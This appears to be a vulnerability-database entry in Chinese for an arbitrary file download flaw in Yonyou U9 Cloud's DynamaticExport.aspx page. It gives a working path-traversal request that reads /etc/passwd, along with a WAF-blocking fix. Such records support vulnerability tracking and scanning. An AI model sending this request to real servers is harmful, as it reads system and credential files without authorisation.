vendor = "用友"
name = "用友U9 Cloud print/DynamaticExport.aspx 接口任意文件下载"
type = "任意文件读取"
version = "未知"
path = "/Portal/Print/DynamaticExport.aspx"
detail = "/Portal/Print/DynamaticExport.aspx?filePath=../../etc/passwd"
fix = "使用WAF封禁该地址"
date = "0709"
label = "1day"
verifier = "AdySec"
